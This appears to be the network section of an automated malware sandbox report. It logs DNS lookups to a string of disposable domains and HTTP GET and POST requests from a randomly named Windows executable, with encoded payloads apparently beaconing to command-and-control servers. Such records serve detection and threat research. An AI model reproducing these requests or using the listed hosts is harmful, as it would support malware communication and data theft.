                                                                                                                                            Oct 10, 2024 12:54:36.445894957 CEST6144180192.168.2.63.33.130.190
                                                                                                                                            Oct 10, 2024 12:54:36.450778961 CEST80614413.33.130.190192.168.2.6
                                                                                                                                            Oct 10, 2024 12:54:36.450840950 CEST6144180192.168.2.63.33.130.190
                                                                                                                                            Oct 10, 2024 12:54:36.461833954 CEST6144180192.168.2.63.33.130.190
                                                                                                                                            Oct 10, 2024 12:54:36.466726065 CEST80614413.33.130.190192.168.2.6
                                                                                                                                            Oct 10, 2024 12:54:36.938731909 CEST80614413.33.130.190192.168.2.6
                                                                                                                                            Oct 10, 2024 12:54:36.938796997 CEST6144180192.168.2.63.33.130.190
                                                                                                                                            Oct 10, 2024 12:54:37.977952003 CEST6144180192.168.2.63.33.130.190
                                                                                                                                            Oct 10, 2024 12:54:37.982841015 CEST80614413.33.130.190192.168.2.6
                                                                                                                                            Oct 10, 2024 12:54:38.994225025 CEST6144280192.168.2.63.33.130.190
                                                                                                                                            Oct 10, 2024 12:54:38.999263048 CEST80614423.33.130.190192.168.2.6
                                                                                                                                            Oct 10, 2024 12:54:38.999340057 CEST6144280192.168.2.63.33.130.190
                                                                                                                                            Oct 10, 2024 12:54:39.009206057 CEST6144280192.168.2.63.33.130.190
                                                                                                                                            Oct 10, 2024 12:54:39.014247894 CEST80614423.33.130.190192.168.2.6
                                                                                                                                            Oct 10, 2024 12:54:39.482913971 CEST80614423.33.130.190192.168.2.6
                                                                                                                                            Oct 10, 2024 12:54:39.486001968 CEST6144280192.168.2.63.33.130.190
                                                                                                                                            Oct 10, 2024 12:54:40.522176027 CEST6144280192.168.2.63.33.130.190
                                                                                                                                            Oct 10, 2024 12:54:40.527086973 CEST80614423.33.130.190192.168.2.6
                                                                                                                                            Oct 10, 2024 12:54:41.542073965 CEST6144380192.168.2.63.33.130.190
                                                                                                                                            Oct 10, 2024 12:54:41.547132969 CEST80614433.33.130.190192.168.2.6
                                                                                                                                            Oct 10, 2024 12:54:41.547241926 CEST6144380192.168.2.63.33.130.190
                                                                                                                                            Oct 10, 2024 12:54:41.557099104 CEST6144380192.168.2.63.33.130.190
                                                                                                                                            Oct 10, 2024 12:54:41.562139034 CEST80614433.33.130.190192.168.2.6
                                                                                                                                            Oct 10, 2024 12:54:41.562354088 CEST80614433.33.130.190192.168.2.6
                                                                                                                                            Oct 10, 2024 12:54:42.030644894 CEST80614433.33.130.190192.168.2.6
                                                                                                                                            Oct 10, 2024 12:54:42.034162998 CEST6144380192.168.2.63.33.130.190
                                                                                                                                            Oct 10, 2024 12:54:43.069104910 CEST6144380192.168.2.63.33.130.190
                                                                                                                                            Oct 10, 2024 12:54:43.074151039 CEST80614433.33.130.190192.168.2.6
                                                                                                                                            Oct 10, 2024 12:54:44.087366104 CEST6144480192.168.2.63.33.130.190
                                                                                                                                            Oct 10, 2024 12:54:44.092600107 CEST80614443.33.130.190192.168.2.6
                                                                                                                                            Oct 10, 2024 12:54:44.094021082 CEST6144480192.168.2.63.33.130.190
                                                                                                                                            Oct 10, 2024 12:54:44.104273081 CEST6144480192.168.2.63.33.130.190
                                                                                                                                            Oct 10, 2024 12:54:44.109147072 CEST80614443.33.130.190192.168.2.6
                                                                                                                                            Oct 10, 2024 12:54:44.559705019 CEST80614443.33.130.190192.168.2.6
                                                                                                                                            Oct 10, 2024 12:54:44.559843063 CEST80614443.33.130.190192.168.2.6
                                                                                                                                            Oct 10, 2024 12:54:44.559895992 CEST6144480192.168.2.63.33.130.190
                                                                                                                                            Oct 10, 2024 12:54:44.562479019 CEST6144480192.168.2.63.33.130.190
                                                                                                                                            Oct 10, 2024 12:54:44.569582939 CEST80614443.33.130.190192.168.2.6
                                                                                                                                            Oct 10, 2024 12:54:49.897977114 CEST6144580192.168.2.6208.91.197.27
                                                                                                                                            Oct 10, 2024 12:54:49.902908087 CEST8061445208.91.197.27192.168.2.6
                                                                                                                                            Oct 10, 2024 12:54:49.906080961 CEST6144580192.168.2.6208.91.197.27
                                                                                                                                            Oct 10, 2024 12:54:49.921968937 CEST6144580192.168.2.6208.91.197.27
                                                                                                                                            Oct 10, 2024 12:54:49.926867008 CEST8061445208.91.197.27192.168.2.6
                                                                                                                                            Oct 10, 2024 12:54:50.448865891 CEST8061445208.91.197.27192.168.2.6
                                                                                                                                            Oct 10, 2024 12:54:50.449011087 CEST6144580192.168.2.6208.91.197.27
                                                                                                                                            Oct 10, 2024 12:54:51.429971933 CEST6144580192.168.2.6208.91.197.27
                                                                                                                                            Oct 10, 2024 12:54:51.435085058 CEST8061445208.91.197.27192.168.2.6
                                                                                                                                            Oct 10, 2024 12:54:52.446966887 CEST6144680192.168.2.6208.91.197.27
                                                                                                                                            Oct 10, 2024 12:54:52.452294111 CEST8061446208.91.197.27192.168.2.6
                                                                                                                                            Oct 10, 2024 12:54:52.452394009 CEST6144680192.168.2.6208.91.197.27
                                                                                                                                            Oct 10, 2024 12:54:52.463586092 CEST6144680192.168.2.6208.91.197.27
                                                                                                                                            Oct 10, 2024 12:54:52.468497038 CEST8061446208.91.197.27192.168.2.6
                                                                                                                                            Oct 10, 2024 12:54:52.965893984 CEST8061446208.91.197.27192.168.2.6
                                                                                                                                            Oct 10, 2024 12:54:52.965962887 CEST6144680192.168.2.6208.91.197.27
                                                                                                                                            Oct 10, 2024 12:54:53.975430012 CEST6144680192.168.2.6208.91.197.27
                                                                                                                                            Oct 10, 2024 12:54:53.980647087 CEST8061446208.91.197.27192.168.2.6
                                                                                                                                            Oct 10, 2024 12:54:54.993858099 CEST6144780192.168.2.6208.91.197.27
                                                                                                                                            Oct 10, 2024 12:54:54.998848915 CEST8061447208.91.197.27192.168.2.6
                                                                                                                                            Oct 10, 2024 12:54:54.998918056 CEST6144780192.168.2.6208.91.197.27
                                                                                                                                            Oct 10, 2024 12:54:55.009452105 CEST6144780192.168.2.6208.91.197.27
                                                                                                                                            Oct 10, 2024 12:54:55.015238047 CEST8061447208.91.197.27192.168.2.6
                                                                                                                                            Oct 10, 2024 12:54:55.015290022 CEST8061447208.91.197.27192.168.2.6
                                                                                                                                            Oct 10, 2024 12:54:55.512526989 CEST8061447208.91.197.27192.168.2.6
                                                                                                                                            Oct 10, 2024 12:54:55.517982006 CEST6144780192.168.2.6208.91.197.27
                                                                                                                                            Oct 10, 2024 12:54:56.522275925 CEST6144780192.168.2.6208.91.197.27
                                                                                                                                            Oct 10, 2024 12:54:56.527371883 CEST8061447208.91.197.27192.168.2.6
                                                                                                                                            Oct 10, 2024 12:54:57.541982889 CEST6144880192.168.2.6208.91.197.27
                                                                                                                                            Oct 10, 2024 12:54:57.547220945 CEST8061448208.91.197.27192.168.2.6
                                                                                                                                            Oct 10, 2024 12:54:57.553709984 CEST6144880192.168.2.6208.91.197.27
                                                                                                                                            Oct 10, 2024 12:54:57.557986975 CEST6144880192.168.2.6208.91.197.27
                                                                                                                                            Oct 10, 2024 12:54:57.562874079 CEST8061448208.91.197.27192.168.2.6
                                                                                                                                            Oct 10, 2024 12:54:58.773294926 CEST8061448208.91.197.27192.168.2.6
                                                                                                                                            Oct 10, 2024 12:54:58.773356915 CEST8061448208.91.197.27192.168.2.6
                                                                                                                                            Oct 10, 2024 12:54:58.773369074 CEST8061448208.91.197.27192.168.2.6
                                                                                                                                            Oct 10, 2024 12:54:58.773482084 CEST6144880192.168.2.6208.91.197.27
                                                                                                                                            Oct 10, 2024 12:54:58.773731947 CEST8061448208.91.197.27192.168.2.6
                                                                                                                                            Oct 10, 2024 12:54:58.773822069 CEST6144880192.168.2.6208.91.197.27
                                                                                                                                            Oct 10, 2024 12:54:58.779421091 CEST6144880192.168.2.6208.91.197.27
                                                                                                                                            Oct 10, 2024 12:54:58.784342051 CEST8061448208.91.197.27192.168.2.6
                                                                                                                                            Oct 10, 2024 12:55:07.403522015 CEST6144980192.168.2.6156.242.132.82
                                                                                                                                            Oct 10, 2024 12:55:07.408849955 CEST8061449156.242.132.82192.168.2.6
                                                                                                                                            Oct 10, 2024 12:55:07.408936977 CEST6144980192.168.2.6156.242.132.82
                                                                                                                                            Oct 10, 2024 12:55:07.414695024 CEST6144980192.168.2.6156.242.132.82
                                                                                                                                            Oct 10, 2024 12:55:07.419805050 CEST8061449156.242.132.82192.168.2.6
                                                                                                                                            TimestampSource PortDest PortSource IPDest IP
                                                                                                                                            Oct 10, 2024 12:51:16.517442942 CEST53653351.1.1.1192.168.2.6
                                                                                                                                            Oct 10, 2024 12:51:27.595257044 CEST5652853192.168.2.61.1.1.1
                                                                                                                                            Oct 10, 2024 12:51:28.158411026 CEST53565281.1.1.1192.168.2.6
                                                                                                                                            Oct 10, 2024 12:51:44.110707045 CEST5001753192.168.2.61.1.1.1
                                                                                                                                            Oct 10, 2024 12:51:44.123749018 CEST53500171.1.1.1192.168.2.6
                                                                                                                                            Oct 10, 2024 12:51:52.214334011 CEST5779153192.168.2.61.1.1.1
                                                                                                                                            Oct 10, 2024 12:51:52.228972912 CEST53577911.1.1.1192.168.2.6
                                                                                                                                            Oct 10, 2024 12:52:05.353116989 CEST5702853192.168.2.61.1.1.1
                                                                                                                                            Oct 10, 2024 12:52:05.761428118 CEST53570281.1.1.1192.168.2.6
                                                                                                                                            Oct 10, 2024 12:52:19.375694990 CEST6281153192.168.2.61.1.1.1
                                                                                                                                            Oct 10, 2024 12:52:19.391541958 CEST53628111.1.1.1192.168.2.6
                                                                                                                                            Oct 10, 2024 12:52:32.729589939 CEST6240853192.168.2.61.1.1.1
                                                                                                                                            Oct 10, 2024 12:52:33.120788097 CEST53624081.1.1.1192.168.2.6
                                                                                                                                            Oct 10, 2024 12:52:47.524877071 CEST5821153192.168.2.61.1.1.1
                                                                                                                                            Oct 10, 2024 12:52:47.622077942 CEST53582111.1.1.1192.168.2.6
                                                                                                                                            Oct 10, 2024 12:53:00.978650093 CEST6298753192.168.2.61.1.1.1
                                                                                                                                            Oct 10, 2024 12:53:00.991739035 CEST53629871.1.1.1192.168.2.6
                                                                                                                                            Oct 10, 2024 12:53:14.165462971 CEST6386353192.168.2.61.1.1.1
                                                                                                                                            Oct 10, 2024 12:53:14.244009018 CEST53638631.1.1.1192.168.2.6
                                                                                                                                            Oct 10, 2024 12:53:27.637849092 CEST6427453192.168.2.61.1.1.1
                                                                                                                                            Oct 10, 2024 12:53:27.688596010 CEST53642741.1.1.1192.168.2.6
                                                                                                                                            Oct 10, 2024 12:53:41.182014942 CEST5344553192.168.2.61.1.1.1
                                                                                                                                            Oct 10, 2024 12:53:41.628035069 CEST53534451.1.1.1192.168.2.6
                                                                                                                                            Oct 10, 2024 12:53:55.405728102 CEST5074853192.168.2.61.1.1.1
                                                                                                                                            Oct 10, 2024 12:53:55.426207066 CEST53507481.1.1.1192.168.2.6
                                                                                                                                            Oct 10, 2024 12:54:09.557866096 CEST6340053192.168.2.61.1.1.1
                                                                                                                                            Oct 10, 2024 12:54:09.655308008 CEST53634001.1.1.1192.168.2.6
                                                                                                                                            Oct 10, 2024 12:54:22.993864059 CEST5906453192.168.2.61.1.1.1
                                                                                                                                            Oct 10, 2024 12:54:23.045358896 CEST53590641.1.1.1192.168.2.6
                                                                                                                                            Oct 10, 2024 12:54:36.431586027 CEST6042953192.168.2.61.1.1.1
                                                                                                                                            Oct 10, 2024 12:54:36.443164110 CEST53604291.1.1.1192.168.2.6
                                                                                                                                            Oct 10, 2024 12:54:49.573966980 CEST5978253192.168.2.61.1.1.1
                                                                                                                                            Oct 10, 2024 12:54:49.892615080 CEST53597821.1.1.1192.168.2.6
                                                                                                                                            TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                                                            Oct 10, 2024 12:51:27.595257044 CEST192.168.2.61.1.1.10xfc5fStandard query (0)www.shanhaiguan.netA (IP address)IN (0x0001)false
                                                                                                                                            Oct 10, 2024 12:51:44.110707045 CEST192.168.2.61.1.1.10xa633Standard query (0)www.useanecdotenow.techA (IP address)IN (0x0001)false
                                                                                                                                            Oct 10, 2024 12:51:52.214334011 CEST192.168.2.61.1.1.10xc060Standard query (0)www.takitoon.xyzA (IP address)IN (0x0001)false
                                                                                                                                            Oct 10, 2024 12:52:05.353116989 CEST192.168.2.61.1.1.10x2fb3Standard query (0)www.nng65.topA (IP address)IN (0x0001)false
                                                                                                                                            Oct 10, 2024 12:52:19.375694990 CEST192.168.2.61.1.1.10xb110Standard query (0)www.bayarcepat19.clickA (IP address)IN (0x0001)false
                                                                                                                                            Oct 10, 2024 12:52:32.729589939 CEST192.168.2.61.1.1.10x7ec8Standard query (0)www.patioprojex.africaA (IP address)IN (0x0001)false
                                                                                                                                            Oct 10, 2024 12:52:47.524877071 CEST192.168.2.61.1.1.10xd688Standard query (0)www.gutpox.lifeA (IP address)IN (0x0001)false
                                                                                                                                            Oct 10, 2024 12:53:00.978650093 CEST192.168.2.61.1.1.10x5b9eStandard query (0)www.rmgltd.servicesA (IP address)IN (0x0001)false
                                                                                                                                            Oct 10, 2024 12:53:14.165462971 CEST192.168.2.61.1.1.10xf6bbStandard query (0)www.turbonotes.appA (IP address)IN (0x0001)false
                                                                                                                                            Oct 10, 2024 12:53:27.637849092 CEST192.168.2.61.1.1.10x9830Standard query (0)www.tempmai.lolA (IP address)IN (0x0001)false
                                                                                                                                            Oct 10, 2024 12:53:41.182014942 CEST192.168.2.61.1.1.10x7eb8Standard query (0)www.kx507981.shopA (IP address)IN (0x0001)false
                                                                                                                                            Oct 10, 2024 12:53:55.405728102 CEST192.168.2.61.1.1.10x19e8Standard query (0)www.aaavvejibej.bondA (IP address)IN (0x0001)false
                                                                                                                                            Oct 10, 2024 12:54:09.557866096 CEST192.168.2.61.1.1.10x3064Standard query (0)www.myjiorooms.servicesA (IP address)IN (0x0001)false
                                                                                                                                            Oct 10, 2024 12:54:22.993864059 CEST192.168.2.61.1.1.10xa07cStandard query (0)www.ultraleap.netA (IP address)IN (0x0001)false
                                                                                                                                            Oct 10, 2024 12:54:36.431586027 CEST192.168.2.61.1.1.10x334fStandard query (0)www.takeun.clubA (IP address)IN (0x0001)false
                                                                                                                                            Oct 10, 2024 12:54:49.573966980 CEST192.168.2.61.1.1.10x3496Standard query (0)www.crochetpets.onlineA (IP address)IN (0x0001)false
                                                                                                                                            TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                                                            Oct 10, 2024 12:51:28.158411026 CEST1.1.1.1192.168.2.60xfc5fNo error (0)www.shanhaiguan.net156.242.132.82A (IP address)IN (0x0001)false
                                                                                                                                            Oct 10, 2024 12:51:44.123749018 CEST1.1.1.1192.168.2.60xa633Name error (3)www.useanecdotenow.technonenoneA (IP address)IN (0x0001)false
                                                                                                                                            Oct 10, 2024 12:51:52.228972912 CEST1.1.1.1192.168.2.60xc060No error (0)www.takitoon.xyztakitoon.xyzCNAME (Canonical name)IN (0x0001)false
                                                                                                                                            Oct 10, 2024 12:51:52.228972912 CEST1.1.1.1192.168.2.60xc060No error (0)takitoon.xyz3.33.130.190A (IP address)IN (0x0001)false
                                                                                                                                            Oct 10, 2024 12:51:52.228972912 CEST1.1.1.1192.168.2.60xc060No error (0)takitoon.xyz15.197.148.33A (IP address)IN (0x0001)false
                                                                                                                                            Oct 10, 2024 12:52:05.761428118 CEST1.1.1.1192.168.2.60x2fb3No error (0)www.nng65.topnng65.topCNAME (Canonical name)IN (0x0001)false
                                                                                                                                            Oct 10, 2024 12:52:05.761428118 CEST1.1.1.1192.168.2.60x2fb3No error (0)nng65.top38.47.233.65A (IP address)IN (0x0001)false
                                                                                                                                            Oct 10, 2024 12:52:19.391541958 CEST1.1.1.1192.168.2.60xb110No error (0)www.bayarcepat19.click188.114.97.3A (IP address)IN (0x0001)false
                                                                                                                                            Oct 10, 2024 12:52:19.391541958 CEST1.1.1.1192.168.2.60xb110No error (0)www.bayarcepat19.click188.114.96.3A (IP address)IN (0x0001)false
                                                                                                                                            Oct 10, 2024 12:52:33.120788097 CEST1.1.1.1192.168.2.60x7ec8No error (0)www.patioprojex.africapatioprojex.africaCNAME (Canonical name)IN (0x0001)false
                                                                                                                                            Oct 10, 2024 12:52:33.120788097 CEST1.1.1.1192.168.2.60x7ec8No error (0)patioprojex.africa197.189.237.186A (IP address)IN (0x0001)false
                                                                                                                                            Oct 10, 2024 12:52:47.622077942 CEST1.1.1.1192.168.2.60xd688No error (0)www.gutpox.life67.223.117.189A (IP address)IN (0x0001)false
                                                                                                                                            Oct 10, 2024 12:53:00.991739035 CEST1.1.1.1192.168.2.60x5b9eNo error (0)www.rmgltd.servicesrmgltd.servicesCNAME (Canonical name)IN (0x0001)false
                                                                                                                                            Oct 10, 2024 12:53:00.991739035 CEST1.1.1.1192.168.2.60x5b9eNo error (0)rmgltd.services3.33.130.190A (IP address)IN (0x0001)false
                                                                                                                                            Oct 10, 2024 12:53:00.991739035 CEST1.1.1.1192.168.2.60x5b9eNo error (0)rmgltd.services15.197.148.33A (IP address)IN (0x0001)false
                                                                                                                                            Oct 10, 2024 12:53:14.244009018 CEST1.1.1.1192.168.2.60xf6bbNo error (0)www.turbonotes.appwebredir.vip.gandi.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                            Oct 10, 2024 12:53:14.244009018 CEST1.1.1.1192.168.2.60xf6bbNo error (0)webredir.vip.gandi.net217.70.184.50A (IP address)IN (0x0001)false
                                                                                                                                            Oct 10, 2024 12:53:27.688596010 CEST1.1.1.1192.168.2.60x9830No error (0)www.tempmai.lol45.33.18.44A (IP address)IN (0x0001)false
                                                                                                                                            Oct 10, 2024 12:53:27.688596010 CEST1.1.1.1192.168.2.60x9830No error (0)www.tempmai.lol173.255.194.134A (IP address)IN (0x0001)false
                                                                                                                                            Oct 10, 2024 12:53:27.688596010 CEST1.1.1.1192.168.2.60x9830No error (0)www.tempmai.lol45.33.30.197A (IP address)IN (0x0001)false
                                                                                                                                            Oct 10, 2024 12:53:27.688596010 CEST1.1.1.1192.168.2.60x9830No error (0)www.tempmai.lol198.58.118.167A (IP address)IN (0x0001)false
                                                                                                                                            Oct 10, 2024 12:53:27.688596010 CEST1.1.1.1192.168.2.60x9830No error (0)www.tempmai.lol72.14.185.43A (IP address)IN (0x0001)false
                                                                                                                                            Oct 10, 2024 12:53:27.688596010 CEST1.1.1.1192.168.2.60x9830No error (0)www.tempmai.lol45.33.2.79A (IP address)IN (0x0001)false
                                                                                                                                            Oct 10, 2024 12:53:27.688596010 CEST1.1.1.1192.168.2.60x9830No error (0)www.tempmai.lol45.56.79.23A (IP address)IN (0x0001)false
                                                                                                                                            Oct 10, 2024 12:53:27.688596010 CEST1.1.1.1192.168.2.60x9830No error (0)www.tempmai.lol96.126.123.244A (IP address)IN (0x0001)false
                                                                                                                                            Oct 10, 2024 12:53:27.688596010 CEST1.1.1.1192.168.2.60x9830No error (0)www.tempmai.lol45.33.20.235A (IP address)IN (0x0001)false
                                                                                                                                            Oct 10, 2024 12:53:27.688596010 CEST1.1.1.1192.168.2.60x9830No error (0)www.tempmai.lol45.79.19.196A (IP address)IN (0x0001)false
                                                                                                                                            Oct 10, 2024 12:53:27.688596010 CEST1.1.1.1192.168.2.60x9830No error (0)www.tempmai.lol72.14.178.174A (IP address)IN (0x0001)false
                                                                                                                                            Oct 10, 2024 12:53:27.688596010 CEST1.1.1.1192.168.2.60x9830No error (0)www.tempmai.lol45.33.23.183A (IP address)IN (0x0001)false
                                                                                                                                            Oct 10, 2024 12:53:41.628035069 CEST1.1.1.1192.168.2.60x7eb8No error (0)www.kx507981.shop54.67.42.145A (IP address)IN (0x0001)false
                                                                                                                                            Oct 10, 2024 12:53:55.426207066 CEST1.1.1.1192.168.2.60x19e8No error (0)www.aaavvejibej.bond172.67.181.150A (IP address)IN (0x0001)false
                                                                                                                                            Oct 10, 2024 12:53:55.426207066 CEST1.1.1.1192.168.2.60x19e8No error (0)www.aaavvejibej.bond104.21.31.249A (IP address)IN (0x0001)false
                                                                                                                                            Oct 10, 2024 12:54:09.655308008 CEST1.1.1.1192.168.2.60x3064No error (0)www.myjiorooms.servicesmyjiorooms.servicesCNAME (Canonical name)IN (0x0001)false
                                                                                                                                            Oct 10, 2024 12:54:09.655308008 CEST1.1.1.1192.168.2.60x3064No error (0)myjiorooms.services3.33.130.190A (IP address)IN (0x0001)false
                                                                                                                                            Oct 10, 2024 12:54:09.655308008 CEST1.1.1.1192.168.2.60x3064No error (0)myjiorooms.services15.197.148.33A (IP address)IN (0x0001)false
                                                                                                                                            Oct 10, 2024 12:54:23.045358896 CEST1.1.1.1192.168.2.60xa07cNo error (0)www.ultraleap.netwebredir.vip.gandi.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                            Oct 10, 2024 12:54:23.045358896 CEST1.1.1.1192.168.2.60xa07cNo error (0)webredir.vip.gandi.net217.70.184.50A (IP address)IN (0x0001)false
                                                                                                                                            Oct 10, 2024 12:54:36.443164110 CEST1.1.1.1192.168.2.60x334fNo error (0)www.takeun.clubtakeun.clubCNAME (Canonical name)IN (0x0001)false
                                                                                                                                            Oct 10, 2024 12:54:36.443164110 CEST1.1.1.1192.168.2.60x334fNo error (0)takeun.club3.33.130.190A (IP address)IN (0x0001)false
                                                                                                                                            Oct 10, 2024 12:54:36.443164110 CEST1.1.1.1192.168.2.60x334fNo error (0)takeun.club15.197.148.33A (IP address)IN (0x0001)false
                                                                                                                                            Oct 10, 2024 12:54:49.892615080 CEST1.1.1.1192.168.2.60x3496No error (0)www.crochetpets.online208.91.197.27A (IP address)IN (0x0001)false
                                                                                                                                            • www.shanhaiguan.net
                                                                                                                                            • www.takitoon.xyz
                                                                                                                                            • www.nng65.top
                                                                                                                                            • www.bayarcepat19.click
                                                                                                                                            • www.patioprojex.africa
                                                                                                                                            • www.gutpox.life
                                                                                                                                            • www.rmgltd.services
                                                                                                                                            • www.turbonotes.app
                                                                                                                                            • www.tempmai.lol
                                                                                                                                            • www.kx507981.shop
                                                                                                                                            • www.aaavvejibej.bond
                                                                                                                                            • www.myjiorooms.services
                                                                                                                                            • www.ultraleap.net
                                                                                                                                            • www.takeun.club
                                                                                                                                            • www.crochetpets.online
                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                            0192.168.2.661251156.242.132.82805788C:\Program Files (x86)\eNBWORsxNPPbckVMLflmySkNuvuVtmDXumyYuKDJR\YKSXcXcWryn.exe
                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                            Oct 10, 2024 12:51:28.176440001 CEST508OUTGET /54aa/?lLYL=kvUX&5vc=YMphRbBqYD1qziPfcxWfV7OUDSA3QU5FUkSnoqDZt26OzjZirNwjAGjBpWvuubqos1AuwzhTz+mW7CpJxDFhVa/HfUjNfzfl4NcBItZkd8PY3xDlIjidjox4juNb6YkC0urLz9Q= HTTP/1.1
                                                                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                                            Host: www.shanhaiguan.net
                                                                                                                                            Connection: close
                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:38.0) Gecko/20100101 Firefox/38.1.0 Waterfox/38.1.0


                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                            1192.168.2.6613873.33.130.190805788C:\Program Files (x86)\eNBWORsxNPPbckVMLflmySkNuvuVtmDXumyYuKDJR\YKSXcXcWryn.exe
                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                            Oct 10, 2024 12:51:52.252243996 CEST767OUTPOST /4qpg/ HTTP/1.1
                                                                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                                            Host: www.takitoon.xyz
                                                                                                                                            Origin: http://www.takitoon.xyz
                                                                                                                                            Connection: close
                                                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                                                            Cache-Control: no-cache
                                                                                                                                            Content-Length: 208
                                                                                                                                            Referer: http://www.takitoon.xyz/4qpg/
                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:38.0) Gecko/20100101 Firefox/38.1.0 Waterfox/38.1.0
                                                                                                                                            Data Raw: 35 76 63 3d 32 61 6a 59 6a 65 4b 34 4e 55 4e 39 37 4e 78 57 46 56 55 61 64 79 58 70 50 76 31 4a 4a 79 34 46 6e 51 66 36 78 7a 39 67 78 68 6d 79 71 4a 6f 71 78 53 6b 69 56 64 76 67 44 43 35 44 47 34 55 32 4c 6c 4b 4e 4e 72 78 47 6a 74 78 48 63 68 30 63 42 79 4e 30 6f 72 41 53 61 33 65 74 70 2f 50 33 36 47 34 72 48 68 68 4b 77 44 69 51 6b 54 4b 43 4e 76 53 4e 38 64 4c 6b 6f 75 32 6d 4e 49 4e 78 33 38 65 78 70 51 42 57 41 65 37 6b 57 2f 55 76 62 46 2b 6f 61 43 37 64 72 75 6e 6e 64 38 31 33 4c 73 44 71 46 6b 43 48 33 71 46 4a 36 66 76 62 2b 6f 54 33 4e 4f 7a 4f 59 70 4b 5a 44 6e 36 39 78 7a 41 66 4a 71 4a 47 43 76 2b 4d
                                                                                                                                            Data Ascii: 5vc=2ajYjeK4NUN97NxWFVUadyXpPv1JJy4FnQf6xz9gxhmyqJoqxSkiVdvgDC5DG4U2LlKNNrxGjtxHch0cByN0orASa3etp/P36G4rHhhKwDiQkTKCNvSN8dLkou2mNINx38expQBWAe7kW/UvbF+oaC7drunnd813LsDqFkCH3qFJ6fvb+oT3NOzOYpKZDn69xzAfJqJGCv+M


                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                            2192.168.2.6613893.33.130.190805788C:\Program Files (x86)\eNBWORsxNPPbckVMLflmySkNuvuVtmDXumyYuKDJR\YKSXcXcWryn.exe
                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                            Oct 10, 2024 12:51:54.796657085 CEST791OUTPOST /4qpg/ HTTP/1.1
                                                                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                                            Host: www.takitoon.xyz
                                                                                                                                            Origin: http://www.takitoon.xyz
                                                                                                                                            Connection: close
                                                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                                                            Cache-Control: no-cache
                                                                                                                                            Content-Length: 232
                                                                                                                                            Referer: http://www.takitoon.xyz/4qpg/
                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:38.0) Gecko/20100101 Firefox/38.1.0 Waterfox/38.1.0
                                                                                                                                            Data Raw: 35 76 63 3d 32 61 6a 59 6a 65 4b 34 4e 55 4e 39 37 74 68 57 48 32 38 61 49 69 58 71 54 66 31 4a 44 53 34 42 6e 51 54 36 78 78 51 6c 78 54 43 79 71 6f 59 71 77 54 6b 69 53 64 76 67 4c 69 35 66 4c 59 56 36 4c 6c 4f 2f 4e 72 4e 47 6a 74 31 48 63 6b 59 63 42 46 68 31 70 37 41 51 53 58 65 76 30 76 50 33 36 47 34 72 48 68 31 30 77 44 36 51 6b 6a 61 43 4d 4f 53 4b 31 39 4c 6e 76 75 32 6d 4a 49 4e 31 33 38 65 50 70 52 64 38 41 63 44 6b 57 36 6f 76 59 55 2b 76 54 43 36 59 6b 4f 6d 45 54 75 77 63 46 50 61 36 43 53 65 39 69 64 35 34 2f 70 75 42 69 62 54 55 66 65 54 4d 59 72 53 72 44 48 36 58 7a 7a 34 66 62 39 46 68 4e 62 62 76 45 53 62 4c 50 71 31 53 4b 58 44 76 36 2f 30 6a 6b 44 44 41 57 67 3d 3d
                                                                                                                                            Data Ascii: 5vc=2ajYjeK4NUN97thWH28aIiXqTf1JDS4BnQT6xxQlxTCyqoYqwTkiSdvgLi5fLYV6LlO/NrNGjt1HckYcBFh1p7AQSXev0vP36G4rHh10wD6QkjaCMOSK19Lnvu2mJIN138ePpRd8AcDkW6ovYU+vTC6YkOmETuwcFPa6CSe9id54/puBibTUfeTMYrSrDH6Xzz4fb9FhNbbvESbLPq1SKXDv6/0jkDDAWg==


                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                            3192.168.2.6613903.33.130.190805788C:\Program Files (x86)\eNBWORsxNPPbckVMLflmySkNuvuVtmDXumyYuKDJR\YKSXcXcWryn.exe
                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                            Oct 10, 2024 12:51:57.335443974 CEST1804OUTPOST /4qpg/ HTTP/1.1
                                                                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                                            Host: www.takitoon.xyz
                                                                                                                                            Origin: http://www.takitoon.xyz
                                                                                                                                            Connection: close
                                                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                                                            Cache-Control: no-cache
                                                                                                                                            Content-Length: 1244
                                                                                                                                            Referer: http://www.takitoon.xyz/4qpg/
                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:38.0) Gecko/20100101 Firefox/38.1.0 Waterfox/38.1.0
